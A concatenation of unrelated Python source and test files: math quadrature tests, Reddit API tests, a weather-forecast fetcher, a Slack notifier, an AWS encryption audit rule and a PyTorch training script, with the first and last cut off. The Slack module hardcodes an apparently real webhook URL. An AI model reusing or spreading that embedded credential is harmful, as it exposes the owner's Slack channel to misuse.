submissions = await self.async_list(self.reddit.front.controversial())
assert len(submissions) == 100
async def test_gilded(self):
with self.use_cassette():
submissions = await self.async_list(self.reddit.front.gilded())
assert len(submissions) == 100
async def test_hot(self):
with self.use_cassette():
submissions = await self.async_list(self.reddit.front.hot())
assert len(submissions) == 100
async def test_new(self):
with self.use_cassette():
submissions = await self.async_list(self.reddit.front.new())
assert len(submissions) == 100
async def test_top(self):
with self.use_cassette():
submissions = await self.async_list(self.reddit.front.top())
assert len(submissions) == 100
|
import math
from distutils.version import LooseVersion
import numpy
import pytest
import scipy
import sympy
from mpmath import mp
import orthopy
import quadpy
def test_golub_welsch(tol=1.0e-14):
"""Test the custom Gauss generator with the weight function x**2.
"""
alpha = 2.0
# Get the moment corresponding to the weight function omega(x) =
# x^alpha:
#
# / 0 if k is odd,
# int_{-1}^{+1} |x^alpha| x^k dx ={
# \ 2/(alpha+k+1) if k is even.
#
n = 5
k = numpy.arange(2 * n + 1)
moments = (1.0 + (-1.0) ** k) / (k + alpha + 1)
alpha, beta = quadpy.tools.golub_welsch(moments)
assert numpy.all(abs(alpha) < tol)
assert abs(beta[0] - 2.0 / 3.0) < tol
assert abs(beta[1] - 3.0 / 5.0) < tol
assert abs(beta[2] - 4.0 / 35.0) < tol
assert abs(beta[3] - 25.0 / 63.0) < tol
assert abs(beta[4] - 16.0 / 99.0) < tol
quadpy.tools.check_coefficients(moments, alpha, beta)
@pytest.mark.parametrize("dtype", [numpy.float, sympy.S])
def test_chebyshev(dtype):
alpha = 2
# Get the moment corresponding to the weight function omega(x) =
# x^alpha:
#
# / 0 if k is odd,
# int_{-1}^{+1} |x^alpha| x^k dx ={
# \ 2/(alpha+k+1) if k is even.
#
n = 5
if dtype == sympy.S:
moments = [sympy.S(1 + (-1) ** kk) / (kk + alpha + 1) for kk in range(2 * n)]
alpha, beta = quadpy.tools.chebyshev(moments)
assert all([a == 0 for a in alpha])
assert (
beta
== [
sympy.S(2) / 3,
sympy.S(3) / 5,
sympy.S(4) / 35,
sympy.S(25) / 63,
sympy.S(16) / 99,
]
).all()
else:
assert dtype == numpy.float
tol = 1.0e-14
k = numpy.arange(2 * n)
moments = (1.0 + (-1.0) ** k) / (k + alpha + 1)
alpha, beta = quadpy.tools.chebyshev(moments)
assert numpy.all(abs(alpha) < tol)
assert numpy.all(
abs(beta - [2.0 / 3.0, 3.0 / 5.0, 4.0 / 35.0, 25.0 / 63.0, 16.0 / 99.0])
< tol
)
def test_chebyshev_modified(tol=1.0e-14):
alpha = 2.0
# Get the moments corresponding to the Legendre polynomials and the weight
# function omega(x) = |x^alpha|:
#
# / 2/3 if k == 0,
# int_{-1}^{+1} |x^alpha| P_k(x) dx ={ 8/45 if k == 2,
# \ 0 otherwise.
#
n = 5
moments = numpy.zeros(2 * n)
moments[0] = 2.0 / 3.0
moments[2] = 8.0 / 45.0
_, _, b, c = orthopy.line_segment.recurrence_coefficients.legendre(
2 * n, "monic", symbolic=False
)
alpha, beta = quadpy.tools.chebyshev_modified(moments, b, c)
assert numpy.all(abs(alpha) < tol)
assert numpy.all(
abs(beta - [2.0 / 3.0, 3.0 / 5.0, 4.0 / 35.0, 25.0 / 63.0, 16.0 / 99.0]) < tol
)
def test_gauss_sympy():
n = 3
a = 0
b = 0
_, _, alpha, beta = orthopy.line_segment.recurrence_coefficients.jacobi(
n, a, b, "monic", symbolic=True
)
points, weights = quadpy.tools.scheme_from_rc(alpha, beta, "sympy")
assert points == [-sympy.sqrt(sympy.S(3) / 5), 0, +sympy.sqrt(sympy.S(3) / 5)]
assert weights == [sympy.S(5) / 9, sympy.S(8) / 9, sympy.S(5) / 9]
def test_gauss_mpmath():
n = 5
a = 0
b = 0
_, _, alpha, beta = orthopy.line_segment.recurrence_coefficients.jacobi(
n, a, b, "monic", symbolic=True
)
mp.dps = 50
points, weights = quadpy.tools.scheme_from_rc(alpha, beta, "mpmath")
tol = 1.0e-50
s = mp.sqrt(5 + 2 * mp.sqrt(mp.mpf(10) / mp.mpf(7))) / 3
t = mp.sqrt(5 - 2 * mp.sqrt(mp.mpf(10) / mp.mpf(7))) / 3
assert (abs(points - [-s, -t, 0.0, +t, +s]) < tol).all()
u = mp.mpf(128) / mp.mpf(225)
v = (322 + 13 * mp.sqrt(70)) / 900
w = (322 - 13 * mp.sqrt(70)) / 900
assert (abs(weights - [w, v, u, v, w]) < tol).all()
def test_gauss_numpy():
n = 5
tol = 1.0e-14
_, _, alpha, beta = orthopy.line_segment.recurrence_coefficients.legendre(
n, "monic", symbolic=False
)
flt = numpy.vectorize(float)
alpha = flt(alpha)
beta = flt(beta)
points, weights = quadpy.tools.scheme_from_rc(alpha, beta, "numpy")
s = math.sqrt(5.0 + 2 * math.sqrt(10.0 / 7.0)) / 3.0
t = math.sqrt(5.0 - 2 * math.sqrt(10.0 / 7.0)) / 3.0
assert (abs(points - [-s, -t, 0.0, +t, +s]) < tol).all()
u = 128.0 / 225.0
v = (322.0 + 13 * math.sqrt(70)) / 900.0
w = (322.0 - 13 * math.sqrt(70)) / 900.0
assert (abs(weights - [w, v, u, v, w]) < tol).all()
@pytest.mark.skipif(
LooseVersion(scipy.__version__) < LooseVersion("1.0.0"), reason="Requires SciPy 1.0"
)
def test_jacobi_reconstruction(tol=1.0e-14):
_, _, alpha1, beta1 = orthopy.line_segment.recurrence_coefficients.jacobi(
4, 2, 1, "monic", symbolic=False
)
points, weights = quadpy.tools.scheme_from_rc(alpha1, beta1, "numpy")
alpha2, beta2 = quadpy.tools.coefficients_from_gauss(points, weights)
assert numpy.all(abs(alpha1 - alpha2) < tol)
assert numpy.all(abs(beta1 - beta2) < tol)
@pytest.mark.skipif(
LooseVersion(scipy.__version__) < LooseVersion("1.0.0"), reason="Requires SciPy 1.0"
)
def test_gautschi_how_to_and_how_not_to():
"""Test Gautschi's famous example from
W. Gautschi,
How and how not to check Gaussian quadrature formulae,
BIT Numerical Mathematics,
June 1983, Volume 23, Issue 2, pp 209–216,
<https://doi.org/10.1007/BF02218441>.
"""
points = numpy.array(
[
1.457697817613696e-02,
8.102669876765460e-02,
2.081434595902250e-01,
3.944841255669402e-01,
6.315647839882239e-01,
9.076033998613676e-01,
1.210676808760832,
1.530983977242980,
1.861844587312434,
2.199712165681546,
2.543839804028289,
2.896173043105410,
3.262066731177372,
3.653371887506584,
4.102376773975577,
]
)
weights = numpy.array(
[
3.805398607861561e-2,
9.622028412880550e-2,
1.572176160500219e-1,
2.091895332583340e-1,
2.377990401332924e-1,
2.271382574940649e-1,
1.732845807252921e-1,
9.869554247686019e-2,
3.893631493517167e-2,
9.812496327697071e-3,
1.439191418328875e-3,
1.088910025516801e-4,
3.546866719463253e-6,
3.590718819809800e-8,
5.112611678291437e-11,
]
)
# weight function exp(-t**3/3)
n = len(points)
moments = numpy.array(
[3.0 ** ((k - 2) / 3.0) * math.gamma((k + 1) / 3.0) for k in range(2 * n)]
)
alpha, beta = quadpy.tools.coefficients_from_gauss(points, weights)
# alpha, beta = quadpy.tools.chebyshev(moments)
errors_alpha, errors_beta = quadpy.tools.check_coefficients(moments, alpha, beta)
assert numpy.max(errors_alpha) > 1.0e-2
assert numpy.max(errors_beta) > 1.0e-2
def test_integrate():
moments = quadpy.tools.integrate(lambda x: [x ** k for k in range(5)], -1, +1)
assert (moments == [2, 0, sympy.S(2) / 3, 0, sympy.S(2) / 5]).all()
moments = quadpy.tools.integrate(
lambda x: orthopy.line_segment.tree_legendre(x, 4, "monic", symbolic=True),
-1,
+1,
)
assert (moments == [2, 0, 0, 0, 0]).all()
# Example from Gautschi's "How to and how not to" article
moments = quadpy.tools.integrate(
lambda x: [x ** k * sympy.exp(-(x ** 3) / 3) for k in range(5)], 0, sympy.oo
)
S = numpy.vectorize(sympy.S)
gamma = numpy.vectorize(sympy.gamma)
n = numpy.arange(5)
reference = 3 ** (S(n - 2) / 3) * gamma(S(n + 1) / 3)
assert numpy.all([sympy.simplify(m - r) == 0 for m, r in zip(moments, reference)])
def test_stieltjes():
alpha0, beta0 = quadpy.tools.stieltjes(lambda t: 1, -1, +1, 5)
_, _, alpha1, beta1 = orthopy.line_segment.recurrence_coefficients.legendre(
5, "monic", symbolic=True
)
assert (alpha0 == alpha1).all()
assert (beta0 == beta1).all()
# def test_expt3():
# '''Full example from Gautschi's "How to and how not to" article.
# '''
# # moments = quadpy.tools.integrate(
# # lambda x: sympy.exp(-x**3/3),
# # 0, sympy.oo,
# # 31
# # )
# # print(moments)
# # alpha, beta = quadpy.tools.chebyshev(moments)
#
# alpha, beta = quadpy.tools.stieltjes(
# lambda x: sympy.exp(-x**3/3),
# 0, sympy.oo,
# 5
# )
# print(alpha)
# print(beta)
@pytest.mark.parametrize("k", [0, 2, 4])
def test_xk(k):
n = 10
moments = quadpy.tools.integrate(
lambda x: [x ** (i + k) for i in range(2 * n)], -1, +1
)
alpha, beta = quadpy.tools.chebyshev(moments)
assert (alpha == 0).all()
assert beta[0] == moments[0]
assert beta[1] == sympy.S(k + 1) / (k + 3)
assert beta[2] == sympy.S(4) / ((k + 5) * (k + 3))
quadpy.tools.scheme_from_rc(
numpy.array([sympy.N(a) for a in alpha], dtype=float),
numpy.array([sympy.N(b) for b in beta], dtype=float),
mode="numpy",
)
def leg_polys(x):
return orthopy.line_segment.tree_legendre(x, 19, "monic", symbolic=True)
moments = quadpy.tools.integrate(
lambda x: [x ** k * leg_poly for leg_poly in leg_polys(x)], -1, +1
)
_, _, a, b = orthopy.line_segment.recurrence_coefficients.legendre(
2 * n, "monic", symbolic=True
)
alpha, beta = quadpy.tools.chebyshev_modified(moments, a, b)
assert (alpha == 0).all()
assert beta[0] == moments[0]
assert beta[1] == sympy.S(k + 1) / (k + 3)
assert beta[2] == sympy.S(4) / ((k + 5) * (k + 3))
points, weights = quadpy.tools.scheme_from_rc(
numpy.array([sympy.N(a) for a in alpha], dtype=float),
numpy.array([sympy.N(b) for b in beta], dtype=float),
mode="numpy",
)
if __name__ == "__main__":
# test_gauss('mpmath')
# test_logo()
test_xk(2)
|
test = { 'name': 'q1_6',
'points': 2,
'suites': [ { 'cases': [ { 'code': '>>> '
'len(simulation_results_without_jokers)\n'
'100000',
'hidden': False,
'locked': False},
{ 'code': '>>> '
'np.count_nonzero(simulation_results_without_jokers '
'<= 26)\n'
'100000',
'hidden': False,
'locked': False},
{ 'code': '>>> '
'np.count_nonzero(simulation_results_without_jokers '
'>= 2)\n'
'100000',
'hidden': False,
'locked': False}],
'scored': True,
'setup': '',
'teardown': '',
'type': 'doctest'}]}
|
from entity import Item
from tool4time import get_timestamp_from_str, is_work_time, now_stamp, get_datetime_from_str, now
def todo_item_key(item: Item):
value = get_timestamp_from_str(item.create_time)
day_second = 60 * 60 * 24
if item.work:
# 如果处于工作时间段, 则相应时间段的任务相当于30天后提交的任务
# 否则相当于30天以前提交的任务
if is_work_time():
value = value + 30 * day_second
else:
value = value - 30 * day_second
if item.specific != 0:
# 由于特定任务只能在某一天完成, 因此具有最高优先级
value = now_stamp()
value = value + 100 * day_second
if item.deadline is not None:
# deadline属性的任务比较剩余时间
# 首先消除创建时间的分值, 统一使用当前时间
# <3天:置顶; <7天,给予一定的权重; > 7天降低权重
value = now_stamp()
deadline = get_datetime_from_str(item.deadline)
delta = deadline - now()
value = value + (56 - 8 * delta.days) * day_second - 8 * delta.seconds
return value
def done_item_key(item: Item):
return get_datetime_from_str(item.finish_time)
def old_item_key(item: Item):
return get_datetime_from_str(item.create_time)
|
"""
Copyright 2019 Skyscanner Ltd
Licensed under the Apache License, Version 2.0 (the "License"); you may not use
this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software distributed
under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
class Encryption:
def __init__(self, item):
self.item = item
def audit(self):
if self.item.arn.service in ['s3', 'dynamodb']:
if not self.item.encryption:
yield {
'level': 'medium',
'text': 'Objects are stored without encryption'
}
|
import requests
from flask import request, url_for
from ..core import server
URL_JOONYOUNG = 'https://hooks.slack.com/services/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'
class Field():
title = ''
value = ''
short = False
def __init__(self, title='', value='', short=False):
self.title = title
self.value = value
self.short = short
def __json__(self):
return {'title': self.title, 'value': self.value, 'short': self.short}
# https://api.slack.com/docs/messages/builder
class Attachment():
title = ''
title_link = None
text = ''
color = '#303A4B'
fields = []
def __init__(self, title, title_link='', fields=[], text='', color=None):
self.title = title
self.title_link = title_link
self.fields = fields
self.text = text
if color:
self.color = color
def __json__(self):
# {
# "fallback":
# "Required plain-text summary of the attachment.",
# "pretext":
# "",
# "author_name":
# "Bobby Tables",
# "author_link":
# "http://flickr.com/bobby/",
# "author_icon":
# "http://flickr.com/icons/bobby.jpg",
# "image_url":
# "http://my-website.com/path/to/image.jpg",
# "thumb_url":
# "http://example.com/path/to/thumb.png",
# "footer":
# "Slack API",
# "footer_icon":
# "https://platform.slack-edge.com/img/default_application_icon.png",
# "ts":
# 123456789
# }
return {
'title': self.title,
'title_link': self.title_link,
'color': self.color,
'text': self.text,
'fields': [f.__json__() for f in self.fields]
}
def _send_slack_message(url, text, attachments=[]):
"""
성공여부를 리턴합니다
"""
if not url:
return False
if not text:
return False
if server.app.config.get('DEBUG'):
url = URL_JOONYOUNG
r = requests.post(
url,
json={
"text": text,
"attachments": [a.__json__() for a in attachments]
})
return (r.text == 'ok')
def post_feedback(description):
return _send_slack_message(
URL_JOONYOUNG,
'[KAIST BUS] {description}'.format(description=description))
|
#!/usr/bin/env python
#coding:utf-8
# Created: 15.11.2010
# Copyright (C) 2010, Manfred Moitzi
# License: MIT License
__author__ = "mozman <mozman@gmx.at>"
import unittest
from dxfwrite.dimlines import _DimStyle
class TestDimStyle(unittest.TestCase):
def test_get_value(self):
style = _DimStyle('test', layer="TESTLAYER")
self.assertEqual(style.layer, "TESTLAYER")
def test_set_value_as_attibute(self):
style = _DimStyle('test', )
style.layer = "TESTLAYER"
self.assertEqual(style.layer, "TESTLAYER")
def test_get_set_value_as_dict(self):
style = _DimStyle('test', )
style['layer'] = "TESTLAYER"
self.assertEqual(style['layer'], "TESTLAYER")
if __name__=='__main__':
unittest.main()
|
# -*- coding: utf-8 -*-
#@+leo-ver=5-thin
#@+node:ekr.20201129023817.1: * @file leoTest2.py
#@@first
"""
Support for Leo's new unit tests, contained in leo/unittests/test_*.py.
Run these tests using unittest or pytest from the command line.
See g.run_unit_tests and g.run_coverage_tests.
This file also contains classes that convert @test nodes in unitTest.leo to
tests in leo/unittest. Eventually these classes will move to scripts.leo.
"""
import time
import unittest
from leo.core import leoGlobals as g
from leo.core import leoApp
#@+others
#@+node:ekr.20201130195111.1: ** function.create_app
def create_app(gui_name='null'):
"""
Create the Leo application, g.app, the Gui, g.app.gui, and a commander.
This method is expensive (0.5 sec) only the first time it is called.
Thereafter, recreating g.app, g.app.gui, and new commands is fast.
"""
trace = False
t1 = time.process_time()
#
# Set g.unitTesting *early*, for guards, to suppress the splash screen, etc.
g.unitTesting = True
# Create g.app now, to avoid circular dependencies.
g.app = leoApp.LeoApp()
# Late imports.
from leo.core import leoConfig
from leo.core import leoNodes
from leo.core import leoCommands
from leo.core.leoGui import NullGui
if gui_name == 'qt':
from leo.plugins.qt_gui import LeoQtGui
t2 = time.process_time()
g.app.recentFilesManager = leoApp.RecentFilesManager()
g.app.loadManager = lm = leoApp.LoadManager()
lm.computeStandardDirectories()
if not g.app.setLeoID(useDialog=False, verbose=True):
raise ValueError("unable to set LeoID.")
g.app.nodeIndices = leoNodes.NodeIndices(g.app.leoID)
g.app.config = leoConfig.GlobalConfigManager()
g.app.db = g.NullObject('g.app.db')
g.app.pluginsController = g.NullObject('g.app.pluginsController')
g.app.commander_cacher = g.NullObject('g.app.commander_cacher')
if gui_name == 'null':
g.app.gui = NullGui()
elif gui_name == 'qt':
g.app.gui = LeoQtGui()
else:
raise TypeError(f"create_gui: unknown gui_name: {gui_name!r}")
t3 = time.process_time()
# Create a dummy commander, to do the imports in c.initObjects.
# Always use a null gui to avoid screen flash.
# setUp will create another commander.
c = leoCommands.Commands(fileName=None, gui=g.app.gui)
# Create minimal config dictionaries.
settings_d, bindings_d = lm.createDefaultSettingsDicts()
lm.globalSettingsDict = settings_d
lm.globalBindingsDict = bindings_d
c.config.settingsDict = settings_d
c.config.bindingsDict = bindings_d
assert g.unitTesting is True # Defensive.
t4 = time.process_time()
# Trace times. This trace happens only once:
# imports: 0.016
# gui: 0.000
# commander: 0.469
# total: 0.484
if trace and t4 - t3 > 0.1:
print('create_app:\n'
f" imports: {(t2-t1):.3f}\n"
f" gui: {(t3-t2):.3f}\n"
f"commander: {(t4-t2):.3f}\n"
f" total: {(t4-t1):.3f}\n")
return c
#@+node:ekr.20210902014907.1: ** class LeoUnitTest(unittest.TestCase)
class LeoUnitTest(unittest.TestCase):
"""
The base class for all unit tests in Leo.
Contains setUp/tearDown methods and various utilites.
"""
#@+others
#@+node:ekr.20210901140855.2: *3* LeoUnitTest.setUp, tearDown & setUpClass
@classmethod
def setUpClass(cls):
create_app(gui_name='null')
def setUp(self):
"""
Create a commander using a **null** gui, regardless of g.app.gui.
Create the nodes in the commander.
"""
# Do the import here to avoid circular dependencies.
from leo.core import leoCommands
from leo.core.leoGui import NullGui
# Set g.unitTesting *early*, for guards.
g.unitTesting = True
# Create a new commander for each test.
# This is fast, because setUpClass has done all the imports.
self.c = c = leoCommands.Commands(fileName=None, gui=NullGui())
# Init the 'root' and '@settings' nodes.
self.root_p = c.rootPosition()
self.root_p.h = 'root'
self.settings_p = self.root_p.insertAfter()
self.settings_p.h = '@settings'
# Select the 'root' node.
c.selectPosition(self.root_p)
def tearDown(self):
self.c = None
#@+node:ekr.20210830151601.1: *3* LeoUnitTest.create_test_outline
def create_test_outline(self):
p = self.c.p
# Create the following outline:
#
# root
# child clone a
# node clone 1
# child b
# child clone a
# node clone 1
# child c
# node clone 1
# child clone a
# node clone 1
# child b
# child clone a
# node clone 1
assert p == self.root_p
assert p.h == 'root'
# Child a
child_clone_a = p.insertAsLastChild()
child_clone_a.h = 'child clone a'
node_clone_1 = child_clone_a.insertAsLastChild()
node_clone_1.h = 'node clone 1'
# Child b
child_b = p.insertAsLastChild()
child_b.h = 'child b'
# Clone 'child clone a'
clone = child_clone_a.clone()
clone.moveToLastChildOf(child_b)
# Child c
child_c = p.insertAsLastChild()
child_c.h = 'child c'
# Clone 'node clone 1'
clone = node_clone_1.clone()
clone.moveToLastChildOf(child_c)
# Clone 'child clone a'
clone = child_clone_a.clone()
clone.moveToLastChildOf(p)
# Clone 'child b'
clone = child_b.clone()
clone.moveToLastChildOf(p)
#@+node:ekr.20210831101111.1: *3* LeoUnitTest.dump_tree
def dump_tree(self, tag=''):
c = self.c
print('')
g.trace(tag)
for p in c.all_positions():
print(f"clone? {int(p.isCloned())} {' '*p.level()} {p.h}")
#@-others
#@-others
#@-leo
|
# # Sample Data
# servers_memory = [
# 32, 32, 32, 16
# ]
# servers_cpu = [
# 10, 12, 8, 12
# ]
# tasks_memory = [
# 4, 8, 12, 16, 2,
# 8, 16, 10, 4, 8
# ]
# tasks_cpu = [
# 2, 4, 12, 8, 1,
# 2, 4, 4, 2, 2
# ]
# task_anti_affinity = [(1, 4), (3, 7), (3, 4), (6, 8)]
if __name__ == "__main__":
from src.allocation import allocator
alloc = allocator.Allocator([allocator.Server(32, 16, 1000)], [allocator.App(12, 12, 500)])
print(alloc.allocate())
|
#!/bin/env python3
# -*- coding: utf-8 -*-
# This little script gets XML data from CPTEC / INPE (Forecast Center
# of Time and Climate Studies of the National Institute for Space Research)
# for Brazilian cities and print the result at the terminal.
import urllib.request
import xml.etree.ElementTree
import sys
import unicodedata
import datetime
TEMPO = {'ec': 'Encoberto com Chuvas Isoladas',
'ci': 'Chuvas Isoladas',
'c': 'Chuva',
'in': 'Instável',
'pp': 'Possibilidade de Pancadas de Chuva',
'cm': 'Chuva pela Manhã',
'cn': 'Chuva à Noite',
'pt': 'Pancadas de Chuva à Tarde',
'pm': 'Pancadas de Chuva pela Manhã',
'np': 'Nublado e Pancadas de Chuva',
'pc': 'Pancadas de Chuva',
'pn': 'Parcialmente Nublado',
'cv': 'Chuvisco',
'ch': 'Chuvoso',
't': 'Tempestade',
'ps': 'Predomínio de Sol',
'e': 'Encoberto',
'n': 'Nublado',
'cl': 'Céu Claro',
'nv': 'Nevoeiro',
'g': 'Geada',
'ne': 'Neve',
'nd': 'Não Definido',
'pnt': 'Pancadas de Chuva à Noite',
'psc': 'Possibilidade de Chuva',
'pcm': 'Possibilidade de Chuva pela Manhã',
'pct': 'Possibilidade de Chuva à Tarde',
'pcn': 'Possibilidade de Chuva à Noite',
'npt': 'Nublado com Pancadas à Tarde',
'npn': 'Nublado com Pancadas à Noite',
'ncn': 'Nublado com Possibilidade de Chuva à Noite',
'nct': 'Nublado com Possibilidade de Chuva à Tarde',
'ncm': 'Nublado com Possibilidade de Chuva pela Manhã',
'npm': 'Nublado com Pancadas de Chuva pela Manhã',
'npp': 'Nublado com Possibilidade de Chuva',
'vn': 'Variação de Nebulosidade',
'ct': 'Chuva à Tarde',
'ppn': 'Possibilidade de Pancadas de Chuva à Noite',
'ppt': 'Possibilidade de Pancadas de Chuva à Tarde',
'ppm': 'Possibilidade de Pancadas de Chuva pela Manhã'}
def getxmlcodes(args):
# Busca do código das cidades
codigos = []
for query in args:
with urllib.request.urlopen('http://servicos.cptec.inpe.br/XML/listaCidades?city={0}'.format(query)) as url:
content = url.read().decode('iso-8859-1')
root = xml.etree.ElementTree.fromstring(content)
codigos.extend([elem.text for elem in root.findall('./cidade/id')])
if len(codigos) == 0:
raise ValueError("A busca não retornou nenhuma cidade")
return codigos
def main():
if len(sys.argv) == 1 or sys.argv[1] in {'-h', '--help'}:
print('Modo de uso: {0} "CIDADE[1]" "CIDADE[2]" ... "CIDADE[N]"\nO uso de aspas (") é obrigatório'
.format(sys.argv[0]))
print('Exemplo: {0} "São Paulo"'.format(sys.argv[0]))
print('Não digite o nome do estado')
sys.exit(1)
# Formatar entrada, remover acentos e substituir espaço por %20
args = [unicodedata.normalize('NFKD', elem).encode('ascii', 'ignore').decode('ascii').lower().replace(' ', '%20')
for elem in sys.argv[1:]]
# Obter XML das cidades
for codes in getxmlcodes(args):
with urllib.request.urlopen('http://servicos.cptec.inpe.br/XML/cidade/{0}/previsao.xml'.format(codes)) as url:
content = url.read().decode('iso-8859-1')
# Filtrar os dados
root = xml.etree.ElementTree.fromstring(content)
dias = [elem.text for elem in root.findall('previsao/dia')]
dias = [datetime.datetime.strptime(
elem, '%Y-%m-%d').strftime('%d/%m/%Y') for elem in dias]
clima = [elem.text for elem in root.findall('previsao/tempo')]
temperaturas = [(ma, mi) for ma, mi in zip([elem.text for elem in root.findall('previsao/maxima')],
[elem.text for elem in root.findall('previsao/minima')])]
iuv = [elem.text for elem in root.findall('previsao/iuv')]
# Imprimir resultado
print(
'\n\nPrevisão do tempo para {0} - {1}:'.format(root[0].text, root[1].text))
print('(Atualizado em {0})\n'.format(datetime.datetime.strptime(
root[2].text, '%Y-%m-%d').strftime('%d/%m/%Y')))
for i in range(len(dias)):
print('Dia {0}:'.format(dias[i]))
print('Clima: {0}'.format(TEMPO[clima[i]]))
print('Temperatura máxima: {0} °C'.format(temperaturas[i][0]))
print('Temperatura mínima: {0} °C'.format(temperaturas[i][1]))
print('Índice UV: {0}'.format(iuv[i]))
print()
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
# Copyright 2018-2021 releng-tool
from releng_tool.util.file_flags import FileFlag
from releng_tool.util.file_flags import process_file_flag
from tests import prepare_workdir
import os
import unittest
class TestFileFlags(unittest.TestCase):
def test_ff_create(self):
with prepare_workdir() as work_dir:
file = os.path.join(work_dir, 'flag-create')
self.assertTrue(not os.path.exists(file))
state = process_file_flag(True, file)
self.assertEqual(state, FileFlag.CONFIGURED)
self.assertTrue(os.path.exists(file))
def test_ff_forced(self):
with prepare_workdir() as work_dir:
file = os.path.join(work_dir, 'flag-forced')
self.assertTrue(not os.path.exists(file))
state = process_file_flag(False, file)
self.assertEqual(state, FileFlag.NO_EXIST)
self.assertTrue(not os.path.exists(file))
open(file, 'ab').close()
self.assertTrue(os.path.exists(file))
state = process_file_flag(False, file)
self.assertEqual(state, FileFlag.NO_EXIST)
self.assertTrue(os.path.exists(file))
def test_ff_read_existence(self):
with prepare_workdir() as work_dir:
file = os.path.join(work_dir, 'flag-exists')
open(file, 'ab').close()
state = process_file_flag(None, file)
self.assertEqual(state, FileFlag.EXISTS)
self.assertTrue(os.path.exists(file))
def test_ff_read_not_exists(self):
with prepare_workdir() as work_dir:
file = os.path.join(work_dir, 'flag-no-exist')
self.assertTrue(not os.path.exists(file))
state = process_file_flag(None, file)
self.assertEqual(state, FileFlag.NO_EXIST)
self.assertTrue(not os.path.exists(file))
|
import unittest
class TestDiagonalCosmoBNNPrior(unittest.TestCase):
"""A suite of tests alerting us for breakge, e.g. errors in
instantiation of classes or execution of scripts, for DiagonalBNNPrior
"""
def test_tdlmc_diagonal_cosmo_config(self):
"""Tests instantiation of TDLMC diagonal Config
"""
import baobab.configs as configs
cfg = configs.BaobabConfig.from_file(configs.tdlmc_diagonal_cosmo_config.__file__)
return cfg
def test_diagonal_cosmo_bnn_prior(self):
"""Tests instantiation and sampling of DiagonalBNNPrior
"""
from baobab.bnn_priors import DiagonalCosmoBNNPrior
cfg = self.test_tdlmc_diagonal_cosmo_config()
diagonal_cosmo_bnn_prior = DiagonalCosmoBNNPrior(cfg.bnn_omega, cfg.components)
return diagonal_cosmo_bnn_prior.sample()
if __name__ == '__main__':
unittest.main()
|
from __future__ import division
import sys
import argparse
import torch
import os
import torch.nn as nn
import torch.optim as optim
import numpy as np
import json
import pickle
from sklearn.metrics import average_precision_score
from torch.utils.data import Dataset, DataLoader
from dataloader import Loader
from model import Model
from myutils import AverageMeter, str2bool, convert_caps, collate, _pad
import ipdb
def test(loader, model):
model.eval()
num_correct = 0.
num_samples = 0.
combined = []
combined_labels = []
with torch.no_grad():
for i, d in enumerate(loader):
art_scores = model(d)
# ipdb.set_trace()
labels = d[-3]
num_samples += len(labels)
cls_idx = torch.argmax(art_scores, dim=1)
correct = cls_idx.cpu() == labels
correct = torch.sum(correct)
num_correct += correct
# debug
# if i == 0:
# scores = art_scores.cpu()
# else:
# scores = torch.cat((scores, art_scores.cpu()), dim=0)
acc = num_correct.item() / num_samples
# ipdb.set_trace()
# debug
# torch.save(scores, './run/results/test_acc_{}.pt'.format(acc))
return acc
def train(loader, model, opt, log_interval, epoch):
model.train()
losses = AverageMeter()
accs = AverageMeter()
for i, d in enumerate(loader):
labels = d[-3]
loss, art_scores = model(d)
loss = torch.mean(loss)
cls_idx = torch.argmax(art_scores, dim=-1)
# ipdb.set_trace()
acc = cls_idx.cpu().detach() == labels
acc = torch.sum(acc).float() / len(acc)
opt.zero_grad()
loss.backward()
opt.step()
num_items = len(d[0])
losses.update(loss.data, num_items)
accs.update(acc, num_items)
if i % log_interval == 0:
print('Train Epoch: {} [{}/{}]\t'
'Loss: {:.4f} ({:.4f})\t'
'acc: {:.4f} ({:.4f})'.format(
epoch, i * num_items, len(train_loader.dataset),
losses.val, losses.avg, accs.val, accs.avg))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("-task", default='ext', type=str, choices=['ext', 'abs'])
parser.add_argument("-encoder", default='bert', type=str, choices=['bert', 'baseline'])
parser.add_argument("-mode", default='train', type=str, choices=['train', 'validate', 'test'])
parser.add_argument("-bert_data_path", default='./run/bert_data_new/cnndm')
parser.add_argument("-result_path", default='./run/results/cnndm')
parser.add_argument("-temp_dir", default='./run/temp')
parser.add_argument("-batch_size", default=2, type=int)
parser.add_argument("-test_batch_size", default=200, type=int)
parser.add_argument("-max_pos", default=512, type=int)
parser.add_argument("-use_interval", type=str2bool, nargs='?',const=True,default=True)
parser.add_argument("-large", type=str2bool, nargs='?',const=True,default=False)
parser.add_argument("-load_from_extractive", default='../trained_models/model_step_148000.pt', type=str)
parser.add_argument("-sep_optim", type=str2bool, nargs='?',const=True,default=False)
parser.add_argument("-lr_bert", default=2e-3, type=float)
parser.add_argument("-lr_dec", default=2e-3, type=float)
parser.add_argument("-use_bert_emb", type=str2bool, nargs='?',const=True,default=False)
parser.add_argument("-share_emb", type=str2bool, nargs='?', const=True, default=False)
parser.add_argument("-finetune_bert", type=str2bool, nargs='?', const=True, default=True)
parser.add_argument("-dec_dropout", default=0.2, type=float)
parser.add_argument("-dec_layers", default=6, type=int)
parser.add_argument("-dec_hidden_size", default=768, type=int)
parser.add_argument("-dec_heads", default=8, type=int)
parser.add_argument("-dec_ff_size", default=2048, type=int)
parser.add_argument("-enc_hidden_size", default=512, type=int)
parser.add_argument("-enc_ff_size", default=512, type=int)
parser.add_argument("-enc_dropout", default=0.2, type=float)
parser.add_argument("-enc_layers", default=6, type=int)
parser.add_argument("-img_feat_size", default=2048, type=int)
parser.add_argument("-num_objs", default=36, type=int)
parser.add_argument("-num_imgs", default=3, type=int)
parser.add_argument('--lr', type=float, default=1e-5, metavar='LR',
help='learning rate')
parser.add_argument('--beta1', type=float, default=0.5, metavar='B1',
help='beta1 for Adam Optimizer')
parser.add_argument('--beta2', type=float, default=0.999, metavar='B2',
help='beta2 for Adam Optimizer')
parser.add_argument("-log_interval", default=1600, type=int)
# params for EXT
parser.add_argument("-ext_dropout", default=0.2, type=float)
parser.add_argument("-ext_layers", default=2, type=int)
parser.add_argument("-ext_hidden_size", default=768, type=int)
parser.add_argument("-ext_heads", default=8, type=int)
